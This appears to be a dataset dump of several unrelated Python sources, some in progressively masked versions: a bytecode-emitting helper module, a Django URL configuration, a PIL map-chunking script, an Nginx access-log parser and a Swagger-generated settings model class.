"step-2": "<mask token>\n\n\nclass Yield:\n\n def __init__(self, yield_point):\n self.yield_point = yield_point\n\n def process(self, context):\n context.add_opcodes(ICONST_val(self.yield_point), JavaOpcodes.\n INVOKEVIRTUAL('org/python/types/Generator', 'yield', args=[\n 'Ljava/util/Map;', 'I'], returns='V'), JavaOpcodes.ARETURN())\n\n\nclass Array:\n\n def __init__(self, size, classname='org/python/Object', fill=None):\n self.size = size\n self.classname = classname\n self.fill = fill\n\n def process(self, context):\n context.add_opcodes(ICONST_val(self.size), JavaOpcodes.ANEWARRAY(\n self.classname))\n if self.fill:\n for i in range(self.size):\n context.add_opcodes(JavaOpcodes.DUP(), ICONST_val(i), self.\n fill, JavaOpcodes.AASTORE())\n\n\nclass List:\n\n def __init__(self, size=None):\n self.size = size\n\n def process(self, context):\n context.add_opcodes(JavaOpcodes.NEW('java/util/ArrayList'),\n JavaOpcodes.DUP())\n if self.size:\n context.add_opcodes(ICONST_val(self.size), Init(\n 'java/util/ArrayList', 'I'))\n else:\n context.add_opcodes(Init('java/util/ArrayList'))\n\n\n class add:\n\n def process(self, context):\n context.add_opcodes(JavaOpcodes.INVOKEINTERFACE(\n 'java/util/List', 'add', args=['Ljava/lang/Object;'],\n returns='Z'), JavaOpcodes.POP())\n\n\nclass Map:\n\n def process(self, context):\n context.add_opcodes(JavaOpcodes.NEW('java/util/HashMap'),\n JavaOpcodes.DUP(), Init('java/util/HashMap'))\n\n\n class get:\n\n def __init__(self, key):\n self.key = key\n\n def process(self, context):\n context.add_opcodes(JavaOpcodes.LDC_W(self.key), JavaOpcodes.\n INVOKEINTERFACE('java/util/Map', 'get', args=[\n 'Ljava/lang/Object;'], returns='Ljava/lang/Object;'))\n\n\n class put:\n\n def process(self, context):\n context.add_opcodes(JavaOpcodes.INVOKEINTERFACE('java/util/Map',\n 'put', args=['Ljava/lang/Object;', 'Ljava/lang/Object;'],\n returns='Ljava/lang/Object;'), JavaOpcodes.POP())\n\n\n class putAll:\n\n def process(self, context):\n 
context.add_opcodes(JavaOpcodes.INVOKEINTERFACE('java/util/Map',\n 'putAll', args=['Ljava/util/Map;'], returns='V'))\n\n\nclass Class:\n\n\n class forName:\n\n def __init__(self, classname):\n self.classname = classname\n\n def process(self, context):\n context.add_opcodes(JavaOpcodes.LDC_W(self.classname),\n JavaOpcodes.INVOKESTATIC('java/lang/Class', 'forName', args\n =['Ljava/lang/String;'], returns='Ljava/lang/Class;'))\n\n\nclass THROW:\n\n def __init__(self, exception_class, *exception_args):\n self.exception_class = exception_class\n self.exc_arg_types = [e[0] for e in exception_args]\n self.exc_arg_values = [e[1] for e in exception_args]\n\n def process(self, context):\n context.add_opcodes(New(self.exception_class), *self.exc_arg_values)\n context.add_opcodes(Init(self.exception_class, *self.exc_arg_types),\n JavaOpcodes.ATHROW())\n",
"step-3": "<mask token>\n\n\nclass Init:\n <mask token>\n <mask token>\n\n\nclass Yield:\n\n def __init__(self, yield_point):\n self.yield_point = yield_point\n\n def process(self, context):\n context.add_opcodes(ICONST_val(self.yield_point), JavaOpcodes.\n INVOKEVIRTUAL('org/python/types/Generator', 'yield', args=[\n 'Ljava/util/Map;', 'I'], returns='V'), JavaOpcodes.ARETURN())\n\n\nclass Array:\n\n def __init__(self, size, classname='org/python/Object', fill=None):\n self.size = size\n self.classname = classname\n self.fill = fill\n\n def process(self, context):\n context.add_opcodes(ICONST_val(self.size), JavaOpcodes.ANEWARRAY(\n self.classname))\n if self.fill:\n for i in range(self.size):\n context.add_opcodes(JavaOpcodes.DUP(), ICONST_val(i), self.\n fill, JavaOpcodes.AASTORE())\n\n\nclass List:\n\n def __init__(self, size=None):\n self.size = size\n\n def process(self, context):\n context.add_opcodes(JavaOpcodes.NEW('java/util/ArrayList'),\n JavaOpcodes.DUP())\n if self.size:\n context.add_opcodes(ICONST_val(self.size), Init(\n 'java/util/ArrayList', 'I'))\n else:\n context.add_opcodes(Init('java/util/ArrayList'))\n\n\n class add:\n\n def process(self, context):\n context.add_opcodes(JavaOpcodes.INVOKEINTERFACE(\n 'java/util/List', 'add', args=['Ljava/lang/Object;'],\n returns='Z'), JavaOpcodes.POP())\n\n\nclass Map:\n\n def process(self, context):\n context.add_opcodes(JavaOpcodes.NEW('java/util/HashMap'),\n JavaOpcodes.DUP(), Init('java/util/HashMap'))\n\n\n class get:\n\n def __init__(self, key):\n self.key = key\n\n def process(self, context):\n context.add_opcodes(JavaOpcodes.LDC_W(self.key), JavaOpcodes.\n INVOKEINTERFACE('java/util/Map', 'get', args=[\n 'Ljava/lang/Object;'], returns='Ljava/lang/Object;'))\n\n\n class put:\n\n def process(self, context):\n context.add_opcodes(JavaOpcodes.INVOKEINTERFACE('java/util/Map',\n 'put', args=['Ljava/lang/Object;', 'Ljava/lang/Object;'],\n returns='Ljava/lang/Object;'), JavaOpcodes.POP())\n\n\n class 
putAll:\n\n def process(self, context):\n context.add_opcodes(JavaOpcodes.INVOKEINTERFACE('java/util/Map',\n 'putAll', args=['Ljava/util/Map;'], returns='V'))\n\n\nclass Class:\n\n\n class forName:\n\n def __init__(self, classname):\n self.classname = classname\n\n def process(self, context):\n context.add_opcodes(JavaOpcodes.LDC_W(self.classname),\n JavaOpcodes.INVOKESTATIC('java/lang/Class', 'forName', args\n =['Ljava/lang/String;'], returns='Ljava/lang/Class;'))\n\n\nclass THROW:\n\n def __init__(self, exception_class, *exception_args):\n self.exception_class = exception_class\n self.exc_arg_types = [e[0] for e in exception_args]\n self.exc_arg_values = [e[1] for e in exception_args]\n\n def process(self, context):\n context.add_opcodes(New(self.exception_class), *self.exc_arg_values)\n context.add_opcodes(Init(self.exception_class, *self.exc_arg_types),\n JavaOpcodes.ATHROW())\n",
"step-4": "<mask token>\n\n\nclass Init:\n\n def __init__(self, classname, *args):\n self.classname = classname\n self.args = args\n\n def process(self, context):\n context.add_opcodes(JavaOpcodes.INVOKESPECIAL(self.classname,\n '<init>', args=self.args, returns='V'))\n\n\nclass Yield:\n\n def __init__(self, yield_point):\n self.yield_point = yield_point\n\n def process(self, context):\n context.add_opcodes(ICONST_val(self.yield_point), JavaOpcodes.\n INVOKEVIRTUAL('org/python/types/Generator', 'yield', args=[\n 'Ljava/util/Map;', 'I'], returns='V'), JavaOpcodes.ARETURN())\n\n\nclass Array:\n\n def __init__(self, size, classname='org/python/Object', fill=None):\n self.size = size\n self.classname = classname\n self.fill = fill\n\n def process(self, context):\n context.add_opcodes(ICONST_val(self.size), JavaOpcodes.ANEWARRAY(\n self.classname))\n if self.fill:\n for i in range(self.size):\n context.add_opcodes(JavaOpcodes.DUP(), ICONST_val(i), self.\n fill, JavaOpcodes.AASTORE())\n\n\nclass List:\n\n def __init__(self, size=None):\n self.size = size\n\n def process(self, context):\n context.add_opcodes(JavaOpcodes.NEW('java/util/ArrayList'),\n JavaOpcodes.DUP())\n if self.size:\n context.add_opcodes(ICONST_val(self.size), Init(\n 'java/util/ArrayList', 'I'))\n else:\n context.add_opcodes(Init('java/util/ArrayList'))\n\n\n class add:\n\n def process(self, context):\n context.add_opcodes(JavaOpcodes.INVOKEINTERFACE(\n 'java/util/List', 'add', args=['Ljava/lang/Object;'],\n returns='Z'), JavaOpcodes.POP())\n\n\nclass Map:\n\n def process(self, context):\n context.add_opcodes(JavaOpcodes.NEW('java/util/HashMap'),\n JavaOpcodes.DUP(), Init('java/util/HashMap'))\n\n\n class get:\n\n def __init__(self, key):\n self.key = key\n\n def process(self, context):\n context.add_opcodes(JavaOpcodes.LDC_W(self.key), JavaOpcodes.\n INVOKEINTERFACE('java/util/Map', 'get', args=[\n 'Ljava/lang/Object;'], returns='Ljava/lang/Object;'))\n\n\n class put:\n\n def process(self, context):\n 
context.add_opcodes(JavaOpcodes.INVOKEINTERFACE('java/util/Map',\n 'put', args=['Ljava/lang/Object;', 'Ljava/lang/Object;'],\n returns='Ljava/lang/Object;'), JavaOpcodes.POP())\n\n\n class putAll:\n\n def process(self, context):\n context.add_opcodes(JavaOpcodes.INVOKEINTERFACE('java/util/Map',\n 'putAll', args=['Ljava/util/Map;'], returns='V'))\n\n\nclass Class:\n\n\n class forName:\n\n def __init__(self, classname):\n self.classname = classname\n\n def process(self, context):\n context.add_opcodes(JavaOpcodes.LDC_W(self.classname),\n JavaOpcodes.INVOKESTATIC('java/lang/Class', 'forName', args\n =['Ljava/lang/String;'], returns='Ljava/lang/Class;'))\n\n\nclass THROW:\n\n def __init__(self, exception_class, *exception_args):\n self.exception_class = exception_class\n self.exc_arg_types = [e[0] for e in exception_args]\n self.exc_arg_values = [e[1] for e in exception_args]\n\n def process(self, context):\n context.add_opcodes(New(self.exception_class), *self.exc_arg_values)\n context.add_opcodes(Init(self.exception_class, *self.exc_arg_types),\n JavaOpcodes.ATHROW())\n",
"step-5": "from ...java import opcodes as JavaOpcodes\n\nfrom .primitives import ICONST_val\n\n\n##########################################################################\n# Common Java operations\n##########################################################################\n\nclass New:\n def __init__(self, classname):\n self.classname = classname\n\n def process(self, context):\n context.add_opcodes(\n JavaOpcodes.NEW(self.classname),\n JavaOpcodes.DUP()\n )\n\n\nclass Init:\n def __init__(self, classname, *args):\n self.classname = classname\n self.args = args\n\n def process(self, context):\n context.add_opcodes(\n JavaOpcodes.INVOKESPECIAL(\n self.classname,\n '<init>',\n args=self.args,\n returns='V'\n ),\n )\n\n\nclass Yield:\n def __init__(self, yield_point):\n self.yield_point = yield_point\n\n def process(self, context):\n context.add_opcodes(\n ICONST_val(self.yield_point),\n JavaOpcodes.INVOKEVIRTUAL(\n 'org/python/types/Generator',\n 'yield',\n args=['Ljava/util/Map;', 'I'],\n returns='V'\n ),\n # \"yield\" by returning from the generator method.\n JavaOpcodes.ARETURN()\n )\n\n\n##########################################################################\n# Java types and their operations\n##########################################################################\n\nclass Array:\n def __init__(self, size, classname='org/python/Object', fill=None):\n self.size = size\n self.classname = classname\n self.fill = fill\n\n def process(self, context):\n context.add_opcodes(\n ICONST_val(self.size),\n JavaOpcodes.ANEWARRAY(self.classname),\n )\n if self.fill:\n for i in range(self.size):\n context.add_opcodes(\n JavaOpcodes.DUP(),\n ICONST_val(i),\n self.fill,\n JavaOpcodes.AASTORE(),\n )\n\n\nclass List:\n def __init__(self, size=None):\n self.size = size\n\n def process(self, context):\n context.add_opcodes(\n JavaOpcodes.NEW('java/util/ArrayList'),\n JavaOpcodes.DUP(),\n )\n\n if self.size:\n context.add_opcodes(\n ICONST_val(self.size),\n 
Init('java/util/ArrayList', 'I')\n )\n else:\n context.add_opcodes(\n Init('java/util/ArrayList')\n )\n\n class add:\n def process(self, context):\n context.add_opcodes(\n JavaOpcodes.INVOKEINTERFACE(\n 'java/util/List',\n 'add',\n args=['Ljava/lang/Object;'],\n returns='Z'\n ),\n JavaOpcodes.POP(),\n )\n\n\nclass Map:\n def process(self, context):\n context.add_opcodes(\n JavaOpcodes.NEW('java/util/HashMap'),\n JavaOpcodes.DUP(),\n Init('java/util/HashMap')\n )\n\n class get:\n def __init__(self, key):\n self.key = key\n\n def process(self, context):\n context.add_opcodes(\n JavaOpcodes.LDC_W(self.key),\n JavaOpcodes.INVOKEINTERFACE(\n 'java/util/Map',\n 'get',\n args=['Ljava/lang/Object;'],\n returns='Ljava/lang/Object;'\n )\n )\n\n class put:\n def process(self, context):\n context.add_opcodes(\n JavaOpcodes.INVOKEINTERFACE(\n 'java/util/Map',\n 'put',\n args=['Ljava/lang/Object;', 'Ljava/lang/Object;'],\n returns='Ljava/lang/Object;'\n ),\n JavaOpcodes.POP()\n )\n\n class putAll:\n def process(self, context):\n context.add_opcodes(\n JavaOpcodes.INVOKEINTERFACE(\n 'java/util/Map',\n 'putAll',\n args=['Ljava/util/Map;'],\n returns='V'\n ),\n )\n\n\nclass Class:\n class forName:\n def __init__(self, classname):\n self.classname = classname\n\n def process(self, context):\n context.add_opcodes(\n JavaOpcodes.LDC_W(self.classname),\n JavaOpcodes.INVOKESTATIC(\n 'java/lang/Class',\n 'forName',\n args=['Ljava/lang/String;'],\n returns='Ljava/lang/Class;'\n ),\n )\n\n\nclass THROW:\n # Raise an exception of given type with given arguments\n # Example:\n # THROW(\n # 'org/python/exceptions/AttributeError',\n # ['Ljava/lang/String;', JavaOpcodes.LDC_W(\"Invalid attribute\")],\n # )\n def __init__(self, exception_class, *exception_args):\n self.exception_class = exception_class\n self.exc_arg_types = [e[0] for e in exception_args]\n self.exc_arg_values = [e[1] for e in exception_args]\n\n def process(self, context):\n context.add_opcodes(\n New(self.exception_class),\n 
*self.exc_arg_values\n )\n context.add_opcodes(\n Init(self.exception_class, *self.exc_arg_types),\n JavaOpcodes.ATHROW(),\n )\n",
"step-ids": [
12,
15,
16,
18,
23
]
}
|
[
12,
15,
16,
18,
23
] |
"""URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.10/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import include, url
from django.contrib import admin
from django.views.generic import TemplateView
from django.conf.urls.static import static
from django.conf import settings
from .auth.views import account_profile
from .views import member_index, member_action
urlpatterns = [
# Landing page area
url(r'^$', TemplateView.as_view(template_name='visitor/landing-index.html'), name='landing_index'),
url(r'^about$', TemplateView.as_view(template_name='visitor/landing-about.html'), name='landing_about'),
url(r'^terms/$', TemplateView.as_view(template_name='visitor/terms.html'), name='website_terms'),
url(r'^contact$', TemplateView.as_view(template_name='visitor/contact.html'), name='website_contact'),
# Account management is done by allauth
url(r'^accounts/', include('allauth.urls')),
# Account profile and member info done locally
url(r'^accounts/profile/$', account_profile, name='account_profile'),
url(r'^member/$', member_index, name='user_home'),
url(r'^member/action$', member_action, name='user_action'),
# Usual Django admin
url(r'^admin/', admin.site.urls),
] + static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)
|
normal
|
{
"blob_id": "312a95c9514722157653365104d8cd0ada760ce8",
"index": 8084,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nurlpatterns = [url('^$', TemplateView.as_view(template_name=\n 'visitor/landing-index.html'), name='landing_index'), url('^about$',\n TemplateView.as_view(template_name='visitor/landing-about.html'), name=\n 'landing_about'), url('^terms/$', TemplateView.as_view(template_name=\n 'visitor/terms.html'), name='website_terms'), url('^contact$',\n TemplateView.as_view(template_name='visitor/contact.html'), name=\n 'website_contact'), url('^accounts/', include('allauth.urls')), url(\n '^accounts/profile/$', account_profile, name='account_profile'), url(\n '^member/$', member_index, name='user_home'), url('^member/action$',\n member_action, name='user_action'), url('^admin/', admin.site.urls)\n ] + static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)\n",
"step-3": "<mask token>\nfrom django.conf.urls import include, url\nfrom django.contrib import admin\nfrom django.views.generic import TemplateView\nfrom django.conf.urls.static import static\nfrom django.conf import settings\nfrom .auth.views import account_profile\nfrom .views import member_index, member_action\nurlpatterns = [url('^$', TemplateView.as_view(template_name=\n 'visitor/landing-index.html'), name='landing_index'), url('^about$',\n TemplateView.as_view(template_name='visitor/landing-about.html'), name=\n 'landing_about'), url('^terms/$', TemplateView.as_view(template_name=\n 'visitor/terms.html'), name='website_terms'), url('^contact$',\n TemplateView.as_view(template_name='visitor/contact.html'), name=\n 'website_contact'), url('^accounts/', include('allauth.urls')), url(\n '^accounts/profile/$', account_profile, name='account_profile'), url(\n '^member/$', member_index, name='user_home'), url('^member/action$',\n member_action, name='user_action'), url('^admin/', admin.site.urls)\n ] + static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)\n",
"step-4": "\"\"\"URL Configuration\r\n\r\nThe `urlpatterns` list routes URLs to views. For more information please see:\r\n https://docs.djangoproject.com/en/1.10/topics/http/urls/\r\nExamples:\r\nFunction views\r\n 1. Add an import: from my_app import views\r\n 2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')\r\nClass-based views\r\n 1. Add an import: from other_app.views import Home\r\n 2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')\r\nIncluding another URLconf\r\n 1. Import the include() function: from django.conf.urls import url, include\r\n 2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))\r\n\"\"\"\r\nfrom django.conf.urls import include, url\r\nfrom django.contrib import admin\r\nfrom django.views.generic import TemplateView\r\nfrom django.conf.urls.static import static\r\nfrom django.conf import settings\r\n\r\nfrom .auth.views import account_profile\r\nfrom .views import member_index, member_action\r\n\r\nurlpatterns = [\r\n # Landing page area\r\n url(r'^$', TemplateView.as_view(template_name='visitor/landing-index.html'), name='landing_index'),\r\n url(r'^about$', TemplateView.as_view(template_name='visitor/landing-about.html'), name='landing_about'),\r\n url(r'^terms/$', TemplateView.as_view(template_name='visitor/terms.html'), name='website_terms'),\r\n url(r'^contact$', TemplateView.as_view(template_name='visitor/contact.html'), name='website_contact'),\r\n\r\n # Account management is done by allauth\r\n url(r'^accounts/', include('allauth.urls')),\r\n\r\n # Account profile and member info done locally\r\n url(r'^accounts/profile/$', account_profile, name='account_profile'),\r\n url(r'^member/$', member_index, name='user_home'),\r\n url(r'^member/action$', member_action, name='user_action'),\r\n\r\n # Usual Django admin\r\n url(r'^admin/', admin.site.urls),\r\n] + static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)\r\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
from PIL import Image
source = Image.open("map4.png")
img = source.load()
map_data = {}
curr_x = 1
curr_y = 1
#Go over each chunk and get the pixel info
for x in range(0, 100, 10):
curr_x = x+1
for y in range(0, 100, 10):
curr_y = y+1
chunk = str(curr_x)+"X"+str(curr_y)
if chunk not in map_data:
map_data[chunk] = {}
for j in range(0, 10):
for k in range(0, 10):
loc = str(curr_x+j)+"x"+str(curr_y+k)
map_data[chunk][loc] = img[x+j, y+k]
#print map_data.keys()
#print map_data["1X1"]
print len(map_data.keys())
print len(map_data["1X1"].keys())
|
normal
|
{
"blob_id": "297b2ff6c6022bd8aac09c25537a132f67e05174",
"index": 525,
"step-1": "from PIL import Image\n\nsource = Image.open(\"map4.png\")\nimg = source.load()\n\nmap_data = {}\n\ncurr_x = 1\ncurr_y = 1\n#Go over each chunk and get the pixel info\nfor x in range(0, 100, 10):\n\tcurr_x = x+1\n\tfor y in range(0, 100, 10):\n\t\tcurr_y = y+1\n\t\tchunk = str(curr_x)+\"X\"+str(curr_y)\n\t\tif chunk not in map_data:\n\t\t\tmap_data[chunk] = {}\n\t\tfor j in range(0, 10):\n\t\t\tfor k in range(0, 10):\n\t\t\t\tloc = str(curr_x+j)+\"x\"+str(curr_y+k)\n\t\t\t\tmap_data[chunk][loc] = img[x+j, y+k]\n#print map_data.keys()\n#print map_data[\"1X1\"]\nprint len(map_data.keys())\nprint len(map_data[\"1X1\"].keys())\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
# -*- coding: utf-8 -*-
# Copyright (c) 2017 Feng Shuo
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
from itertools import islice
from config import RequestInfo
import re
__all__ = ['NginxRequestInfo', ]
class NginxLogParse(object):
"""
Parse Nginx access.log into certain request info
"""
__slots__ = ('_ngx_log', 'ngx_log',)
def __init__(self):
self._ngx_log = '/var/log/nginx/access.log'
@property
def ngx_log(self):
"""
ngx_log filename
:returns: ngx_log filename
:rtype: ``string``
"""
return self._ngx_log
@ngx_log.setter
def ngx_log(self, nginx_log):
"""
set ngx_log
"""
self._ngx_log = nginx_log
def get_ngx_logs(self, line_nums=-1000):
"""
Get nginx logs by line_nums
:param line_nums:
line/row number in nginx log
:type line_nums:
``integer``
:returns:
if line_nums > 0, then get single request message line
if line_nums = 0, get all request messages lines
if line_nums < 0, get latest ${line_nums} request messages lines
:rtype:
``list``
"""
try:
with open(self.ngx_log) as F:
if line_nums > 0:
for line in islice(F, line_nums-1, line_nums):
return [line]
else:
lines = F.readlines()[line_nums:]
return lines
except Exception as e:
print "Failed to get detail log(s) in nginx access.log due to %s" % e
@staticmethod
def ngx_log_to_requestinfo(log=None):
"""
Parse nginx request log(one row/line) into namedtuple instance ``Request_info`` defined in class
:param log:
one nginx request log log in access.log you extracted
:type log:
string
"""
# pat is defined due to default nginx access.log format
pat = (r''
'(\d+.\d+.\d+.\d+)\s-\s-\s'
'\[(.+)\]\s'
'"GET\s(.+)\s\w+/.+"\s'
'(\d+)\s'
'(\d+)\s'
'"(.+)"\s'
'"(.+)"'
)
if log:
request_info = re.findall(pat, log)[0]
if request_info:
request_info = RequestInfo(request_info[0], request_info[1], request_info[2], request_info[3],
request_info[4], request_info[5], request_info[6])
return request_info
# TODO should move to test
# ngx_request_info = NginxLogParse()
# ngx_request_info.ngx_log = '../test.log'
# line = ngx_request_info.get_ngx_logs(100)
# req_info = ngx_request_info.ngx_log_to_requestinfo(line[0])
|
normal
|
{
"blob_id": "a299bd230a25a646060f85cffc8e84c534e2f805",
"index": 8185,
"step-1": "# -*- coding: utf-8 -*-\n# Copyright (c) 2017 Feng Shuo\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n\n\nfrom itertools import islice\nfrom config import RequestInfo\nimport re\n\n__all__ = ['NginxRequestInfo', ]\n\n\nclass NginxLogParse(object):\n \"\"\"\n Parse Nginx access.log into certain request info\n \"\"\"\n\n __slots__ = ('_ngx_log', 'ngx_log',)\n\n def __init__(self):\n self._ngx_log = '/var/log/nginx/access.log'\n\n @property\n def ngx_log(self):\n \"\"\"\n ngx_log filename\n :returns: ngx_log filename\n :rtype: ``string``\n \"\"\"\n return self._ngx_log\n\n @ngx_log.setter\n def ngx_log(self, nginx_log):\n \"\"\"\n set ngx_log\n \"\"\"\n self._ngx_log = nginx_log\n\n def get_ngx_logs(self, line_nums=-1000):\n \"\"\"\n Get nginx logs by line_nums\n :param line_nums:\n line/row number in nginx log\n :type line_nums:\n ``integer``\n :returns:\n if line_nums > 0, then get single request message line\n if line_nums = 0, get all request messages lines\n if line_nums < 0, get latest ${line_nums} request messages lines\n :rtype:\n ``list``\n \"\"\"\n try:\n with open(self.ngx_log) as F:\n if line_nums > 0:\n for line in islice(F, line_nums-1, line_nums):\n return [line]\n else:\n lines = F.readlines()[line_nums:]\n return lines\n except Exception as e:\n print \"Failed to get detail log(s) in nginx access.log due to %s\" % e\n\n @staticmethod\n def ngx_log_to_requestinfo(log=None):\n \"\"\"\n Parse nginx request log(one row/line) into namedtuple instance ``Request_info`` defined in class\n :param log:\n one nginx request log log in access.log you extracted\n :type log:\n string\n \"\"\"\n # pat is defined due to default nginx access.log format\n pat = (r''\n '(\\d+.\\d+.\\d+.\\d+)\\s-\\s-\\s'\n '\\[(.+)\\]\\s'\n '\"GET\\s(.+)\\s\\w+/.+\"\\s'\n '(\\d+)\\s'\n 
'(\\d+)\\s'\n '\"(.+)\"\\s'\n '\"(.+)\"'\n )\n if log:\n request_info = re.findall(pat, log)[0]\n if request_info:\n request_info = RequestInfo(request_info[0], request_info[1], request_info[2], request_info[3],\n request_info[4], request_info[5], request_info[6])\n return request_info\n\n\n# TODO should move to test\n# ngx_request_info = NginxLogParse()\n# ngx_request_info.ngx_log = '../test.log'\n# line = ngx_request_info.get_ngx_logs(100)\n# req_info = ngx_request_info.ngx_log_to_requestinfo(line[0])\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
<|reserved_special_token_0|>
class RawDataSettingsV1(object):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def __init__(self, data_aggregation_setting=None, raw_data_setting=None,
units_setting=None, work_hours_setting=None):
"""RawDataSettingsV1 - a model defined in Swagger"""
self._data_aggregation_setting = None
self._raw_data_setting = None
self._units_setting = None
self._work_hours_setting = None
self.discriminator = None
if data_aggregation_setting is not None:
self.data_aggregation_setting = data_aggregation_setting
if raw_data_setting is not None:
self.raw_data_setting = raw_data_setting
if units_setting is not None:
self.units_setting = units_setting
if work_hours_setting is not None:
self.work_hours_setting = work_hours_setting
<|reserved_special_token_0|>
<|reserved_special_token_0|>
@property
def raw_data_setting(self):
"""Gets the raw_data_setting of this RawDataSettingsV1. # noqa: E501
:return: The raw_data_setting of this RawDataSettingsV1. # noqa: E501
:rtype: RawDataSettingV1
"""
return self._raw_data_setting
<|reserved_special_token_0|>
@property
def units_setting(self):
"""Gets the units_setting of this RawDataSettingsV1. # noqa: E501
:return: The units_setting of this RawDataSettingsV1. # noqa: E501
:rtype: UnitsSetting
"""
return self._units_setting
@units_setting.setter
def units_setting(self, units_setting):
"""Sets the units_setting of this RawDataSettingsV1.
:param units_setting: The units_setting of this RawDataSettingsV1. # noqa: E501
:type: UnitsSetting
"""
self._units_setting = units_setting
@property
def work_hours_setting(self):
"""Gets the work_hours_setting of this RawDataSettingsV1. # noqa: E501
:return: The work_hours_setting of this RawDataSettingsV1. # noqa: E501
:rtype: WorkHoursSetting
"""
return self._work_hours_setting
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, RawDataSettingsV1):
return False
return self.__dict__ == other.__dict__
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class RawDataSettingsV1(object):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def __init__(self, data_aggregation_setting=None, raw_data_setting=None,
units_setting=None, work_hours_setting=None):
"""RawDataSettingsV1 - a model defined in Swagger"""
self._data_aggregation_setting = None
self._raw_data_setting = None
self._units_setting = None
self._work_hours_setting = None
self.discriminator = None
if data_aggregation_setting is not None:
self.data_aggregation_setting = data_aggregation_setting
if raw_data_setting is not None:
self.raw_data_setting = raw_data_setting
if units_setting is not None:
self.units_setting = units_setting
if work_hours_setting is not None:
self.work_hours_setting = work_hours_setting
@property
def data_aggregation_setting(self):
"""Gets the data_aggregation_setting of this RawDataSettingsV1. # noqa: E501
:return: The data_aggregation_setting of this RawDataSettingsV1. # noqa: E501
:rtype: DataAggregationSetting
"""
return self._data_aggregation_setting
@data_aggregation_setting.setter
def data_aggregation_setting(self, data_aggregation_setting):
"""Sets the data_aggregation_setting of this RawDataSettingsV1.
:param data_aggregation_setting: The data_aggregation_setting of this RawDataSettingsV1. # noqa: E501
:type: DataAggregationSetting
"""
self._data_aggregation_setting = data_aggregation_setting
@property
def raw_data_setting(self):
"""Gets the raw_data_setting of this RawDataSettingsV1. # noqa: E501
:return: The raw_data_setting of this RawDataSettingsV1. # noqa: E501
:rtype: RawDataSettingV1
"""
return self._raw_data_setting
@raw_data_setting.setter
def raw_data_setting(self, raw_data_setting):
"""Sets the raw_data_setting of this RawDataSettingsV1.
:param raw_data_setting: The raw_data_setting of this RawDataSettingsV1. # noqa: E501
:type: RawDataSettingV1
"""
self._raw_data_setting = raw_data_setting
@property
def units_setting(self):
"""Gets the units_setting of this RawDataSettingsV1. # noqa: E501
:return: The units_setting of this RawDataSettingsV1. # noqa: E501
:rtype: UnitsSetting
"""
return self._units_setting
@units_setting.setter
def units_setting(self, units_setting):
"""Sets the units_setting of this RawDataSettingsV1.
:param units_setting: The units_setting of this RawDataSettingsV1. # noqa: E501
:type: UnitsSetting
"""
self._units_setting = units_setting
@property
def work_hours_setting(self):
"""Gets the work_hours_setting of this RawDataSettingsV1. # noqa: E501
:return: The work_hours_setting of this RawDataSettingsV1. # noqa: E501
:rtype: WorkHoursSetting
"""
return self._work_hours_setting
@work_hours_setting.setter
def work_hours_setting(self, work_hours_setting):
"""Sets the work_hours_setting of this RawDataSettingsV1.
:param work_hours_setting: The work_hours_setting of this RawDataSettingsV1. # noqa: E501
:type: WorkHoursSetting
"""
self._work_hours_setting = work_hours_setting
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(lambda x: x.to_dict() if hasattr(x,
'to_dict') else x, value))
elif hasattr(value, 'to_dict'):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(lambda item: (item[0], item[1].
to_dict()) if hasattr(item[1], 'to_dict') else item,
value.items()))
else:
result[attr] = value
if issubclass(RawDataSettingsV1, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, RawDataSettingsV1):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class RawDataSettingsV1(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {'data_aggregation_setting': 'DataAggregationSetting',
'raw_data_setting': 'RawDataSettingV1', 'units_setting':
'UnitsSetting', 'work_hours_setting': 'WorkHoursSetting'}
